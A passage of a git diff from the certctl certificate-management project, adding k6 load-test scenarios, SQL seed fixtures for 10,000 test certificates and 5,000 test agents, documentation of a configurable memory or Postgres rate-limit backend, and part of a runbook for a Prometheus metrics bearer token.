// scale compose's DB pool (CERTCTL_DATABASE_MAX_CONNS=50). The
|
||||||
|
// Phase 8 scenario should measure the per-call ceiling without
|
||||||
|
// fighting the pool.
|
||||||
|
// - Each call enqueues thousands of jobs; the scheduler's
|
||||||
|
// jobProcessorLoop has finite per-tick budget. Pushing higher
|
||||||
|
// than 5 req/s would queue work faster than the scheduler
|
||||||
|
// drains it, which produces a transient backlog metric (worth
|
||||||
|
// measuring eventually) but isn't what SCALE-H2 asks for.
|
||||||
|
export const options = {
|
||||||
|
scenarios: {
|
||||||
|
bulk_renewal: {
|
||||||
|
executor: 'constant-arrival-rate',
|
||||||
|
rate: 5,
|
||||||
|
timeUnit: '1s',
|
||||||
|
duration: '5m',
|
||||||
|
preAllocatedVUs: 10,
|
||||||
|
maxVUs: 30,
|
||||||
|
exec: 'bulkRenewal',
|
||||||
|
tags: { scenario: 'bulk_renewal' },
|
||||||
|
},
|
||||||
|
},
|
||||||
|
thresholds: {
|
||||||
|
// Single-scenario threshold — narrower than the API tier
|
||||||
|
// because each call is heavier (DB scan + N inserts).
|
||||||
|
'http_req_duration{scenario:bulk_renewal}': ['p(99)<5000', 'p(95)<2000'],
|
||||||
|
'http_req_failed{scenario:bulk_renewal}': ['rate<0.01'],
|
||||||
|
},
|
||||||
|
summaryTrendStats: ['avg', 'min', 'med', 'p(95)', 'p(99)', 'max'],
|
||||||
|
insecureSkipTLSVerify: true,
|
||||||
|
};
|
||||||
|
|
||||||
|
export function bulkRenewal() {
|
||||||
|
// Scope by team_id — the seed binds every loadtest cert to
|
||||||
|
// t-platform; in a production-multi-tenant deploy, team scoping
|
||||||
|
// is the typical bulk-renew shape. This exercises the criteria
|
||||||
|
// walker AND the team-scoped permission check in the handler.
|
||||||
|
//
|
||||||
|
// NOTE: this does NOT include `tags` because the BulkRenewalCriteria
|
||||||
|
// domain type (handler/bulk_renewal.go) only exposes profile_id,
|
||||||
|
// owner_id, agent_id, issuer_id, team_id, certificate_ids — not
|
||||||
|
// tag-based filtering. The team_id scope plus the production-
|
||||||
|
// separated FK guarantees we only touch the Phase 8 seed.
|
||||||
|
const payload = JSON.stringify({
|
||||||
|
team_id: 't-platform',
|
||||||
|
issuer_id: 'iss-local',
|
||||||
|
});
|
||||||
|
|
||||||
|
const res = http.post(`${BASE}/api/v1/certificates/bulk-renew`, payload, {
|
||||||
|
headers: {
|
||||||
|
'Content-Type': 'application/json',
|
||||||
|
'Authorization': `Bearer ${TOKEN}`,
|
||||||
|
},
|
||||||
|
tags: { scenario: 'bulk_renewal' },
|
||||||
|
});
|
||||||
|
|
||||||
|
check(res, {
|
||||||
|
'bulk-renew 2xx': (r) => r.status >= 200 && r.status < 300,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
export function handleSummary(data) {
|
||||||
|
return {
|
||||||
|
'/results/summary-bulk-renewal.json': JSON.stringify(data, null, 2),
|
||||||
|
'/results/summary-bulk-renewal.txt': textSummary(data, { indent: ' ', enableColors: false }),
|
||||||
|
stdout: textSummary(data, { indent: ' ', enableColors: true }),
|
||||||
|
};
|
||||||
|
}
|
||||||
@@ -0,0 +1,85 @@
|
|||||||
|
-- Phase 8 SCALE-H2: bulk-renewal scenario seed.
|
||||||
|
--
|
||||||
|
-- Generates 10,000 managed_certificates rows linked to the existing
|
||||||
|
-- seed_demo.sql FKs (iss-local, o-alice, t-platform, rp-standard) so
|
||||||
|
-- the bulk-renewal k6 scenario can POST /api/v1/certificates/bulk-renew
|
||||||
|
-- against a fleet-scale dataset instead of the 15-row demo seed.
|
||||||
|
--
|
||||||
|
-- Behavior:
|
||||||
|
-- - Idempotent. ON CONFLICT (name) DO NOTHING — re-running the seed
|
||||||
|
-- against an already-seeded DB is a no-op.
|
||||||
|
-- - expires_at is uniformly distributed across the next 30 days so
|
||||||
|
-- a renewal_window_days = 30 policy considers every row eligible.
|
||||||
|
-- - status = 'active' so the renewal selector treats them as
|
||||||
|
-- live (the scheduler skips status IN ('pending', 'failed',
|
||||||
|
-- 'revoked', 'retired')).
|
||||||
|
-- - name is generated as 'loadtest-bulk-NNNNN.example.test' for a
|
||||||
|
-- stable, predictable identifier the k6 scenario can pattern-match
|
||||||
|
-- to scope its criteria to the seeded set (the production fleet
|
||||||
|
-- wouldn't share this prefix).
|
||||||
|
--
|
||||||
|
-- Volume target: 10,000 rows. Insert wall time on the loadtest stack
|
||||||
|
-- (postgres:16-alpine, 2 CPU / 4 GiB): typically < 5 seconds via the
|
||||||
|
-- single-statement generate_series + INSERT pattern below. The
|
||||||
|
-- compose seed-init container runs this BEFORE the k6 driver starts,
|
||||||
|
-- so the steady-state load measurement isn't affected by seed time.
|
||||||
|
--
|
||||||
|
-- Why not generated in Go via a fixtures helper:
|
||||||
|
-- - The certctl-server boots from a clean DB and runs migrations +
|
||||||
|
-- seed_demo.sql automatically when CERTCTL_DEMO_SEED=true. Adding
|
||||||
|
-- a Go-side fixtures helper would require either (a) a new
|
||||||
|
-- CERTCTL_LOADTEST_SEED flag wired into cmd/server/main.go (cross-
|
||||||
|
-- cutting change for one test path) or (b) a separate seed binary
|
||||||
|
-- (more compose surface). Raw SQL is the smallest viable change.
|
||||||
|
--
|
||||||
|
-- Phase 8 entry point — runs only when the loadtest compose stack is
|
||||||
|
-- explicitly opted into the scale-seed via LOADTEST_SCALE_SEED=true.
|
||||||
|
|
||||||
|
INSERT INTO managed_certificates (
|
||||||
|
id,
|
||||||
|
name,
|
||||||
|
common_name,
|
||||||
|
sans,
|
||||||
|
environment,
|
||||||
|
owner_id,
|
||||||
|
team_id,
|
||||||
|
issuer_id,
|
||||||
|
renewal_policy_id,
|
||||||
|
status,
|
||||||
|
expires_at,
|
||||||
|
tags,
|
||||||
|
created_at,
|
||||||
|
updated_at
|
||||||
|
)
|
||||||
|
SELECT
|
||||||
|
'cert-loadtest-bulk-' || lpad(g::text, 5, '0'),
|
||||||
|
'loadtest-bulk-' || lpad(g::text, 5, '0') || '.example.test',
|
||||||
|
'loadtest-bulk-' || lpad(g::text, 5, '0') || '.example.test',
|
||||||
|
ARRAY['loadtest-bulk-' || lpad(g::text, 5, '0') || '.example.test'],
|
||||||
|
'loadtest',
|
||||||
|
'o-alice',
|
||||||
|
't-platform',
|
||||||
|
'iss-local',
|
||||||
|
'rp-standard',
|
||||||
|
'active',
|
||||||
|
-- Distribute expires_at uniformly across the next 30 days so a
|
||||||
|
-- 30-day-window renewal policy sees every row as eligible.
|
||||||
|
NOW() + ((g % 30) || ' days')::interval + ((g % 24) || ' hours')::interval,
|
||||||
|
jsonb_build_object('source', 'loadtest-phase8', 'batch', 'bulk-renewal'),
|
||||||
|
NOW(),
|
||||||
|
NOW()
|
||||||
|
FROM generate_series(1, 10000) AS g
|
||||||
|
ON CONFLICT (name) DO NOTHING;
|
||||||
|
|
||||||
|
-- Confirmation row count — the seed-init container greps this in its
|
||||||
|
-- logs to verify the fleet shape post-insert. The output appears in
|
||||||
|
-- `docker compose logs certctl-loadtest-scale-seed` after the run.
|
||||||
|
DO $$
|
||||||
|
DECLARE
|
||||||
|
cert_count integer;
|
||||||
|
BEGIN
|
||||||
|
SELECT COUNT(*) INTO cert_count
|
||||||
|
FROM managed_certificates
|
||||||
|
WHERE name LIKE 'loadtest-bulk-%';
|
||||||
|
RAISE NOTICE 'Phase 8 bulk-renewal seed: % managed_certificates rows present', cert_count;
|
||||||
|
END $$;
|
||||||
@@ -0,0 +1,85 @@
|
|||||||
|
-- Phase 8 SCALE-H2: agent-fleet heartbeat-storm scenario seed.
|
||||||
|
--
|
||||||
|
-- Generates 5,000 agents rows so the heartbeat-storm k6 scenario can
|
||||||
|
-- model a fleet-scale heartbeat pattern (5K agents heartbeating at the
|
||||||
|
-- native 30s cadence = ~167 heartbeats/sec sustained) instead of the
|
||||||
|
-- ~10-agent demo seed.
|
||||||
|
--
|
||||||
|
-- Behavior:
|
||||||
|
-- - Idempotent. ON CONFLICT (id) DO NOTHING — re-runnable against an
|
||||||
|
-- already-seeded DB.
|
||||||
|
-- - name is unique (a UNIQUE constraint in migration 000001) so the
|
||||||
|
-- name suffix mirrors the id suffix.
|
||||||
|
-- - status = 'Online' so the heartbeat handler's retire-check
|
||||||
|
-- (service.ErrAgentRetired) doesn't 410 the storm.
|
||||||
|
-- - last_heartbeat_at staggered across the prior 60 seconds so the
|
||||||
|
-- stale-agent reaper (agentHealthCheckLoop) doesn't immediately
|
||||||
|
-- flip half the fleet to 'Offline' during the first scheduler
|
||||||
|
-- tick of the load run.
|
||||||
|
-- - api_key_hash = 'loadtest_no_auth'. The loadtest compose runs
|
||||||
|
-- CERTCTL_AUTH_TYPE=api-key with a single static token
|
||||||
|
-- (load-test-token), which bypasses per-agent key check the same
|
||||||
|
-- way the existing API tier scenarios do. Production deploys with
|
||||||
|
-- CERTCTL_AUTH_TYPE=agent-key per-agent would seed real bcrypt'd
|
||||||
|
-- hashes; this column is opaque to the load-test path.
|
||||||
|
-- - registered_at = NOW() - random 1-90 day interval so agent age
|
||||||
|
-- looks realistic and any age-based query plans are exercised.
|
||||||
|
--
|
||||||
|
-- Volume target: 5,000 rows. The agents schema is much narrower than
|
||||||
|
-- managed_certificates so the insert is sub-second on the loadtest
|
||||||
|
-- stack. The 5K agents do not own any deployment_targets in this
|
||||||
|
-- fixture (the scenario only measures the heartbeat hot path, not
|
||||||
|
-- the work-poll path which depends on cert + target wiring).
|
||||||
|
--
|
||||||
|
-- Phase 8 entry point — runs only when the loadtest compose stack is
|
||||||
|
-- explicitly opted into the scale-seed via LOADTEST_SCALE_SEED=true.
|
||||||
|
|
||||||
|
INSERT INTO agents (
|
||||||
|
id,
|
||||||
|
name,
|
||||||
|
hostname,
|
||||||
|
status,
|
||||||
|
last_heartbeat_at,
|
||||||
|
registered_at,
|
||||||
|
api_key_hash,
|
||||||
|
os,
|
||||||
|
architecture,
|
||||||
|
ip_address,
|
||||||
|
version
|
||||||
|
)
|
||||||
|
SELECT
|
||||||
|
'ag-loadtest-' || lpad(g::text, 5, '0'),
|
||||||
|
'loadtest-agent-' || lpad(g::text, 5, '0'),
|
||||||
|
'loadtest-' || lpad(g::text, 5, '0') || '.fleet.example.test',
|
||||||
|
'Online',
|
||||||
|
-- Stagger last_heartbeat_at across the prior 60 seconds (= 2x the
|
||||||
|
-- agent's native poll interval) so the first wave of incoming
|
||||||
|
-- heartbeats doesn't all arrive in lockstep at t=0.
|
||||||
|
NOW() - ((g % 60) || ' seconds')::interval,
|
||||||
|
-- Registered_at randomized 1-90 days back.
|
||||||
|
NOW() - ((g % 90 + 1) || ' days')::interval,
|
||||||
|
'loadtest_no_auth',
|
||||||
|
-- Mix linux/windows/darwin so the OS distribution column in the
|
||||||
|
-- agents page isn't pure-linux during the storm.
|
||||||
|
CASE (g % 10)
|
||||||
|
WHEN 0 THEN 'windows'
|
||||||
|
WHEN 1 THEN 'darwin'
|
||||||
|
ELSE 'linux'
|
||||||
|
END,
|
||||||
|
-- amd64 dominates; arm64 minority.
|
||||||
|
CASE WHEN (g % 5) = 0 THEN 'arm64' ELSE 'amd64' END,
|
||||||
|
-- IPv4 in the 10.42.0.0/16 fleet range, deterministic per id.
|
||||||
|
'10.42.' || ((g / 256) % 256)::text || '.' || (g % 256)::text,
|
||||||
|
'2.1.0'
|
||||||
|
FROM generate_series(1, 5000) AS g
|
||||||
|
ON CONFLICT (id) DO NOTHING;
|
||||||
|
|
||||||
|
DO $$
|
||||||
|
DECLARE
|
||||||
|
agent_count integer;
|
||||||
|
BEGIN
|
||||||
|
SELECT COUNT(*) INTO agent_count
|
||||||
|
FROM agents
|
||||||
|
WHERE id LIKE 'ag-loadtest-%';
|
||||||
|
RAISE NOTICE 'Phase 8 agent-storm seed: % agents rows present', agent_count;
|
||||||
|
END $$;
|
||||||
@@ -0,0 +1,87 @@
|
|||||||
|
# Phase 8 load-test seed fixtures
|
||||||
|
|
||||||
|
Opt-in seed scripts that grow the loadtest DB from the demo-scale
|
||||||
|
fixture (~15 certs / ~10 agents from `migrations/seed_demo.sql`) to
|
||||||
|
fleet scale (10K certs + 5K agents) so the Phase 8 SCALE-H2 scenarios
|
||||||
|
measure something representative.
|
||||||
|
|
||||||
|
## When these run
|
||||||
|
|
||||||
|
The default `make loadtest` path does NOT touch this directory — the
|
||||||
|
API tier and connector tier scenarios run against the demo seed alone
|
||||||
|
and complete in ~5 minutes. The Phase 8 scenarios opt-in via the
|
||||||
|
`LOADTEST_SCALE_SEED=true` environment variable; when set, the
|
||||||
|
`certctl-loadtest-scale-seed` one-shot init container runs every
|
||||||
|
`*.sql` file in this directory in lexical order against the same
|
||||||
|
Postgres instance the server uses.
|
||||||
|
|
||||||
|
Compose service wiring (see `../docker-compose.yml`):
|
||||||
|
- Service: `scale-seed`
|
||||||
|
- Profile: `scale-seed` (compose `profiles:` gate; not started by
|
||||||
|
default)
|
||||||
|
- Depends on: `postgres` (service_healthy) AND `certctl-server`
|
||||||
|
(service_healthy — server runs schema migrations at boot so the
|
||||||
|
seed runs AFTER tables exist)
|
||||||
|
- Order: lexical (`01_bulk_renewal_certs.sql` then
|
||||||
|
`02_agent_fleet.sql`)
|
||||||
|
- Idempotent: every script uses `ON CONFLICT DO NOTHING` so re-running
|
||||||
|
is a no-op.
|
||||||
|
|
||||||
|
## What gets seeded
|
||||||
|
|
||||||
|
| File | Rows | Purpose |
|
||||||
|
|---|---|---|
|
||||||
|
| `01_bulk_renewal_certs.sql` | 10,000 managed_certificates | Fleet shape for `bulk_renewal.js`. All linked to demo FKs (iss-local, o-alice, t-platform, rp-standard). Status `active`, expires_at distributed across the next 30 days so a 30-day renewal window considers every row eligible. Name prefix `loadtest-bulk-` so the k6 scenario can scope its bulk-renew criteria. |
|
||||||
|
| `02_agent_fleet.sql` | 5,000 agents | Fleet shape for `agent_storm.js`. Status `Online`, last_heartbeat_at staggered across prior 60s, name prefix `loadtest-agent-`. OS distribution: 80% linux / 10% windows / 10% darwin. Arch: 80% amd64 / 20% arm64. |
|
||||||
|
|
||||||
|
## How to run the Phase 8 scenarios locally
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd deploy/test/loadtest
|
||||||
|
LOADTEST_SCALE_SEED=true docker compose --profile scale-seed up --build \
|
||||||
|
--abort-on-container-exit --exit-code-from k6-scale
|
||||||
|
```
|
||||||
|
|
||||||
|
Or via the dedicated Makefile target (preferred for CI parity):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
make loadtest-scale
|
||||||
|
```
|
||||||
|
|
||||||
|
## Why SQL fixtures instead of a Go seed binary
|
||||||
|
|
||||||
|
- The certctl-server already boots from a clean DB and runs migrations
|
||||||
|
+ `seed_demo.sql` when `CERTCTL_DEMO_SEED=true`. Adding a third seed
|
||||||
|
mode (loadtest-scale) would mean either a new
|
||||||
|
`CERTCTL_LOADTEST_SEED` flag wired into `cmd/server/main.go` (cross-
|
||||||
|
cutting change for one test path) or a separate seed binary (more
|
||||||
|
compose surface).
|
||||||
|
- Raw SQL is the smallest viable change: each script is a single
|
||||||
|
multi-row `INSERT … SELECT FROM generate_series(…)` plus a
|
||||||
|
`DO $$ … RAISE NOTICE` confirmation block.
|
||||||
|
- Idempotency is straightforward via `ON CONFLICT … DO NOTHING` — the
|
||||||
|
same pattern `seed_demo.sql` uses.
|
||||||
|
|
||||||
|
## Why these volumes specifically
|
||||||
|
|
||||||
|
- **10K certs.** The SCALE-H2 audit asked for "10K certs with
|
||||||
|
renewal_at < now." Round number, fits in postgres:16-alpine on a
|
||||||
|
CI runner without OOM, and large enough that the renewal selector's
|
||||||
|
query plan is exercised (the demo's 15 rows would index-scan
|
||||||
|
trivially).
|
||||||
|
- **5K agents.** Heartbeat at 30s cadence = ~167 heartbeats/sec
|
||||||
|
sustained. That's well above the 50 req/s the existing API tier
|
||||||
|
measures and stresses the agent.heartbeat handler's per-call cost
|
||||||
|
(last_heartbeat_at UPDATE + the RBAC permission check + the
|
||||||
|
audit-log row).
|
||||||
|
|
||||||
|
If a future scenario needs more rows (50K certs / 10K agents), add a
|
||||||
|
new `03_…sql` here and another scenario file. Don't grow the existing
|
||||||
|
files — re-running existing scenarios against a different fixture
|
||||||
|
shape would invalidate the captured baseline.
|
||||||
|
|
||||||
|
## Phase 8 audit reference
|
||||||
|
|
||||||
|
Source finding: SCALE-H2 in
|
||||||
|
`cowork/certctl-architecture-diligence-audit.html`.
|
||||||
|
Phase 8 closure commit: see `git log --grep='Phase 8'`.
|
||||||
+128
-38
@@ -121,52 +121,142 @@ explicitly scrubs the password before it reaches the audit subsystem
|
|||||||
(see [`docs/operator/auth-threat-model.md`](auth-threat-model.md) §
|
(see [`docs/operator/auth-threat-model.md`](auth-threat-model.md) §
|
||||||
"Break-glass token leak").
|
"Break-glass token leak").
|
||||||
|
|
||||||
## Rate-limit behavior under restarts and replicas
|
## Rate-limit behavior — configurable backend (memory or postgres)
|
||||||
|
|
||||||
Where rate limits exist, they are **per-process, in-memory,
|
The sliding-window-log rate limiters used across certctl's
|
||||||
reset-on-restart, and not shared across replicas**. This matters for
|
authenticated-but-shared-credential code paths (break-glass login,
|
||||||
multi-replica deployments and for any compliance posture that asks
|
OCSP per-IP, cert-export per-actor, EST per-principal, EST
|
||||||
"what limits apply globally vs per-pod."
|
failed-basic source-IP) carry a **configurable backend**. The
|
||||||
|
operator picks between two implementations via
|
||||||
|
`CERTCTL_RATE_LIMIT_BACKEND`:
|
||||||
|
|
||||||
|
| Value | When to use |
|
||||||
|
|------------|------------------------------------------------------|
|
||||||
|
| `memory` | Default. Single-replica deploys; sketchpad / dev. |
|
||||||
|
| `postgres` | HA deploys (`server.replicas > 1`). Cross-replica-consistent. |
|
||||||
|
|
||||||
|
Phase 13 Sprint 13.2/13.3 (architecture diligence audit ARCH-M1
|
||||||
|
closure) replaced the prior single-process limitation with a
|
||||||
|
substantive close: when the operator opts into `postgres`, all
|
||||||
|
replicas share the same
|
||||||
|
`rate_limit_buckets` table (migration 000046) and per-key access is
|
||||||
|
arbitrated via `SELECT FOR UPDATE` row locks. A 3-replica cluster
|
||||||
|
hitting one rate-limited endpoint concurrently sees exactly the
|
||||||
|
configured cap succeed across the cluster — not 3× the cap as the
|
||||||
|
old per-process backend would have allowed.
|
||||||
|
|
||||||
|
### Operator decision tree
|
||||||
|
|
||||||
|
```
|
||||||
|
Single replica (server.replicas = 1, the helm chart default)?
|
||||||
|
└─ Use CERTCTL_RATE_LIMIT_BACKEND=memory (the default; no action
|
||||||
|
required). Bucket lookups stay in-process; zero DB round-trips
|
||||||
|
on the hot path.
|
||||||
|
|
||||||
|
Two or more replicas?
|
||||||
|
└─ Use CERTCTL_RATE_LIMIT_BACKEND=postgres. Two extra DB round-trips
|
||||||
|
per Allow call (BEGIN ... SELECT FOR UPDATE ... UPDATE ... COMMIT);
|
||||||
|
acceptable on the gated hot path. The Sprint 13.2 multi-replica
|
||||||
|
integration test pins exactly-cap enforcement across N replicas
|
||||||
|
as the closure proof.
|
||||||
|
```
|
||||||
|
|
||||||
### Inventory
|
### Inventory
|
||||||
|
|
||||||
| Limiter | Scope | Window | Cap | Survives restart? | Shared across replicas? |
|
| Limiter | Scope | Window | Cap |
|
||||||
|---|---|---|---|---|---|
|
|---|---|---|---|
|
||||||
| Break-glass login (per source-IP) | `internal/api/handler/auth_breakglass.go` | 60s | 5 attempts | No | No |
|
| Break-glass login (per source-IP) | `internal/api/handler/auth_breakglass.go` | 60s | 5 attempts |
|
||||||
| SCEP/Intune per-device challenge | `internal/scep/intune/` | 60s | configurable (`*_PER_MINUTE`) | No | No |
|
| OCSP query (per source-IP) | `internal/api/handler/certificates.go` | 60s | configurable (`CERTCTL_OCSP_RATE_LIMIT_PER_IP_MIN`) |
|
||||||
| EST per-principal CSR enrollment | `internal/est/` | 60s | configurable | No | No |
|
| Cert export (per actor) | `internal/api/handler/export.go` | 1h | configurable (`CERTCTL_CERT_EXPORT_RATE_LIMIT_PER_ACTOR_HR`) |
|
||||||
| EST HTTP-Basic source-IP failed-auth | `internal/est/` | 60s | configurable | No | No |
|
| EST per-principal CSR enrollment | `internal/api/handler/est.go` | 24h | configurable (per-profile `RateLimitPerPrincipal24h`) |
|
||||||
| ACME per-account orders / key-change / challenge-respond | `internal/service/acme.go` | 1h | configurable | No | No |
|
| EST HTTP-Basic source-IP failed-auth | `internal/api/handler/est.go` | 60m | 10 attempts |
|
||||||
|
| SCEP/Intune per-device challenge | `internal/scep/intune/` | 60s | configurable (`*_PER_MINUTE`) |
|
||||||
|
| ACME per-account orders / key-change / challenge-respond | `internal/service/acme.go` | 1h | configurable |
|
||||||
|
|
||||||
All five use the shared `internal/ratelimit/sliding_window.go`
|
The `CERTCTL_RATE_LIMIT_BACKEND` selector applies to the first five
|
||||||
primitive. Buckets live in a single per-process map guarded by a
|
(the cmd/server-wired limiters). The SCEP/Intune wrapper + the ACME
|
||||||
mutex; the package-level cap prevents unbounded growth under
|
per-account limiter ride their own internal accounting today; both
|
||||||
adversarial key cardinality (default 100,000 keys; oldest-by-newest-
|
are tracked as follow-ups in WORKSPACE-ROADMAP.md.
|
||||||
timestamp evicted under pressure).
|
|
||||||
|
|
||||||
### Implications for multi-replica deployments
|
### Backend internals
|
||||||
|
|
||||||
- **Effective per-replica cap is the documented cap.** A 2-replica
|
Both backends share the algorithm: sliding-window log + per-key
|
||||||
deployment lets through up to 2× the per-key window cap before
|
bucket + prune-on-Allow.
|
||||||
either replica rejects.
|
|
||||||
- **Restart resets the bucket.** A `kubectl rollout restart` empties
|
|
||||||
the in-memory windows on every replica. An attacker who notices
|
|
||||||
this could in principle re-issue burst attempts after every roll;
|
|
||||||
the threat model accepts this because rollouts are operator-driven
|
|
||||||
and the relevant endpoints already require credentials.
|
|
||||||
- **No cross-replica fan-out.** Rate-limit decisions on replica A
|
|
||||||
are not visible to replica B. Sticky-session ingress routing (with
|
|
||||||
`service.spec.sessionAffinity: ClientIP` on Kubernetes or the
|
|
||||||
equivalent on your load balancer) tightens the effective cap to
|
|
||||||
per-replica + per-source-IP rather than per-replica + per-source-IP
|
|
||||||
for whichever pod the request happened to land on.
|
|
||||||
|
|
||||||
If your threat model requires globally-enforced rate limits across
|
**Memory backend (`memory`)** — per-process map keyed by bucket key;
|
||||||
replicas, the implementation surface is roughly: swap the per-process
|
mutex-guarded; package-level LRU cap prevents unbounded growth under
|
||||||
map for a database-backed sliding window (or a Redis-backed equivalent
|
adversarial key cardinality (default 100,000 keys per limiter
|
||||||
if you already run Redis). This is on the
|
instance; oldest-by-newest-timestamp evicted under pressure).
|
||||||
[WORKSPACE-ROADMAP.md](../../WORKSPACE-ROADMAP.md) as a v3 item;
|
Implemented at `internal/ratelimit/sliding_window.go`.
|
||||||
nothing in the certctl threat model today requires it.
|
|
||||||
|
**Postgres backend (`postgres`)** — same algorithm against the
|
||||||
|
`rate_limit_buckets` table:
|
||||||
|
|
||||||
|
```sql
|
||||||
|
CREATE TABLE rate_limit_buckets (
|
||||||
|
bucket_key TEXT PRIMARY KEY,
|
||||||
|
timestamps TIMESTAMPTZ[] NOT NULL DEFAULT '{}',
|
||||||
|
updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
`Allow(key, now)` opens a transaction, ensures the row exists
|
||||||
|
(`INSERT ... ON CONFLICT DO NOTHING`), acquires the row lock
|
||||||
|
(`SELECT ... FOR UPDATE`), prunes timestamps older than `now-window`,
|
||||||
|
compares the post-prune count against `maxN`, conditionally appends
|
||||||
|
`now`, persists, and commits. The row lock is what arbitrates across
|
||||||
|
replicas: replicas A and B firing simultaneous `Allow("k")` never
|
||||||
|
race because Postgres serializes the per-key row update across the
|
||||||
|
cluster. Implemented at
|
||||||
|
`internal/ratelimit/postgres_sliding_window.go`.
|
||||||
|
|
||||||
|
### Janitor sweep (postgres backend only)
|
||||||
|
|
||||||
|
The scheduler runs a `rate_limit_buckets` janitor every
|
||||||
|
`CERTCTL_RATE_LIMIT_JANITOR_INTERVAL` (default 5m, minimum 1m). The
|
||||||
|
sweep deletes rows whose `updated_at` is older than the longest
|
||||||
|
configured window any limiter uses (24h today, matching the EST
|
||||||
|
per-principal limiter). Idempotent; repeated sweeps find zero rows.
|
||||||
|
The memory backend's prune-on-Allow path keeps buckets short-lived
|
||||||
|
without a separate sweep, so the loop is a no-op when
|
||||||
|
`backend=memory`.
|
||||||
|
|
||||||
|
### Falsifiable closure proof
|
||||||
|
|
||||||
|
The Phase 13 Sprint 13.2 integration test
|
||||||
|
`internal/integration/ratelimit_multi_replica_test.go`
|
||||||
|
(`//go:build integration`) fires 100 concurrent `Allow("test-key")`
|
||||||
|
calls round-robined across 3 independent `PostgresSlidingWindowLimiter`
|
||||||
|
instances sharing one Postgres database (`cap=10`, `window=1m`) and
|
||||||
|
asserts exactly 10 succeed + 90 return `ErrRateLimited`. If the
|
||||||
|
cross-replica row lock weren't arbitrating, each replica would
|
||||||
|
independently let through ~3-4 requests, giving 12-15 successes
|
||||||
|
total. Re-run:
|
||||||
|
|
||||||
|
```
|
||||||
|
go test -tags=integration -count=1 -run TestRateLimit_MultiReplica \
|
||||||
|
./internal/integration/...
|
||||||
|
```
|
||||||
|
|
||||||
|
### Helm chart wiring
|
||||||
|
|
||||||
|
The helm chart at `deploy/helm/certctl/` exposes the backend via
|
||||||
|
`server.rateLimiting.backend` (default `memory`). To opt into the
|
||||||
|
postgres backend for an HA deploy:
|
||||||
|
|
||||||
|
```
|
||||||
|
helm upgrade --install certctl deploy/helm/certctl \
|
||||||
|
--set server.replicas=3 \
|
||||||
|
--set server.rateLimiting.backend=postgres \
|
||||||
|
--set server.rateLimiting.janitorInterval=5m
|
||||||
|
```
|
||||||
|
|
||||||
|
`server.replicas > 1` without flipping `backend` to `postgres` works
|
||||||
|
fine — the limits stay per-process — but the operator gets a 2× /
|
||||||
|
3× / Nx effective cap depending on replica count. The chart does NOT
|
||||||
|
auto-flip on `replicas > 1` because some HA deploys deliberately want
|
||||||
|
per-process limits (sticky-session ingress + tight per-replica caps
|
||||||
|
to detect bot traffic at the edge before it hits the application).
|
||||||
|
|
||||||
### Where these numbers live
|
### Where these numbers live
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,243 @@
|
|||||||
|
# Runbook: Prometheus bearer token for the metrics scrape endpoint
|
||||||
|
|
||||||
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
|
Use this when:
|
||||||
|
- You're enabling Prometheus Operator scraping via the Helm chart's
|
||||||
|
`monitoring.serviceMonitor.enabled` toggle.
|
||||||
|
- Your Prometheus scrapes are returning 401 against
|
||||||
|
`/api/v1/metrics/prometheus`.
|
||||||
|
- An auditor asks "how is the metrics endpoint authenticated?"
|
||||||
|
|
||||||
|
## The constraint
|
||||||
|
|
||||||
|
The certctl server exposes Prometheus metrics at
|
||||||
|
`/api/v1/metrics/prometheus`. This endpoint is **RBAC-gated on the
|
||||||
|
`metrics.read` permission** (per `internal/api/router/router.go`).
|
||||||
|
Like every other gated handler, it requires an authenticated actor
|
||||||
|
holding that permission — there is no anonymous-scrape path.
|
||||||
|
|
||||||
|
The rationale: the metrics payload includes operational counters
|
||||||
|
(cert counts by status, agent counts, issuance failure rates) that
|
||||||
|
a public-facing observer should not see. Most certctl deployments
|
||||||
|
expose a reverse proxy / load balancer to the wider network; the
|
||||||
|
auth gate on `/api/v1/metrics/prometheus` prevents an external
|
||||||
|
observer from learning operational state via the metrics endpoint
|
||||||
|
even when the proxy itself is reachable.
|
||||||
|
|
||||||
|
## What you need to set up
|
||||||
|
|
||||||
|
Three pieces:
|
||||||
|
|
||||||
|
1. **An API key with `metrics.read` permission** (and only that
|
||||||
|
permission — least-privilege).
|
||||||
|
2. **A Kubernetes Secret** holding that API key.
|
||||||
|
3. **`monitoring.serviceMonitor.bearerTokenSecret`** in the chart's
|
||||||
|
values pointing at the Secret.
|
||||||
|
|
||||||
|
## Step 1: Create the metrics-read role + API key
|
||||||
|
|
||||||
|
The chart's seed migration ships a `metrics-read` role-template, but
|
||||||
|
some operators want a dedicated identity per scrape source. Both
|
||||||
|
approaches work; the dedicated-identity path is below.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Bootstrap or impersonate a session with auth.role.assign +
|
||||||
|
# auth.apikey.create permissions (admin actor is fine).
|
||||||
|
|
||||||
|
# 2. Create a role with only metrics.read.
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/roles \
|
||||||
|
-d '{"id":"r-prometheus-scrape","name":"Prometheus scrape","permissions":["metrics.read"]}'
|
||||||
|
|
||||||
|
# 3. Create an actor that holds the role.
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/actors \
|
||||||
|
-d '{"id":"actor-prometheus","name":"Prometheus scrape","roles":["r-prometheus-scrape"]}'
|
||||||
|
|
||||||
|
# 4. Mint an API key for the actor. The response includes a
|
||||||
|
# `key_value` field that's only returned ONCE — capture it.
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/apikeys \
|
||||||
|
-d '{"actor_id":"actor-prometheus","name":"prometheus-scrape-token"}' \
|
||||||
|
| tee /tmp/prom-key.json
|
||||||
|
|
||||||
|
